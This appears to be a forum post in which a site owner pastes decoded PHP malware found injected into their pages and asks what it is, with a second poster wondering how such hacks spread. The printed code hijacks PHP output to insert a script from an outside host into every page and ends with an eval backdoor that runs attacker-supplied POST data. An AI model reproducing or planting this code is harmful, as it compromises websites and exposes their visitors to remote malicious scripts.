Hi friends, The following code automatically creates in the php page, Let me know what is the issue and why it is created...pls help. Thanks.
if (!isset($glmha1)) { function glmha($s) { if (preg_match_all('#<script(.*?)</script>#is', $s, $a)) foreach ($a[0] as $v) if (count(explode("\n", $v)) > 5) { $e = preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#', $v) || preg_match('#[\(\[](\s*\d+,){20,}#', $v); if ((preg_match('#\beval\b#', $v) && ($e || strpos($v, 'fromCharCode'))) || ($e && strpos($v, 'document.write'))) $s = str_replace($v, '', $s); } if (preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is', $s, $a)) foreach ($a[0] as $v) if (preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i', $v) && !strstr($v, '?'.'>')) $s = preg_replace('#'.preg_quote($v, '#').'.*?</iframe>#is', '', $s); $s = str_replace($a = '<script src=http://mumbaishopping.biz/blog/add_business.php ></script>', '', $s); if (stristr($s, '<body')) $s = preg_replace('#(\s*<body)#mi', $a.'\1', $s); elseif (strpos($s, ',a')) $s .= $a; return $s; } function glmha2($a, $b, $c, $d) { global $glmha1; $s = array(); if (function_exists($glmha1)) call_user_func($glmha1, $a, $b, $c, $d); foreach (@ob_get_status(1) as $v) if (($a = $v['name']) == 'glmha') return; elseif ($a == 'ob_gzhandler') break; else $s[] = array($a == 'default output handler' ? false : $a); for ($i = count($s) - 1; $i >= 0; $i--) { $s[$i][1] = ob_get_contents(); ob_end_clean(); } ob_start('glmha'); for ($i = 0; $i < count($s); $i++) { ob_start($s[$i][0]); echo $s[$i][1]; } } } $glmhal = (($a = @set_error_handler('glmha2')) != 'glmha2') ? $a : 0; eval(base64_decode($_POST['e'])); PHP: This is it decoded
I'd also be interested to know why there seems to have been an upsurge in the amount of people reporting this type of hack to their site, is it some kind of cPanel or FTP bug/flaw that's gone unnoticed? Or just badly written php scripts that allow sql injection leading to admin account hijacking (or FTP account access allowing arbitrary source code editing)?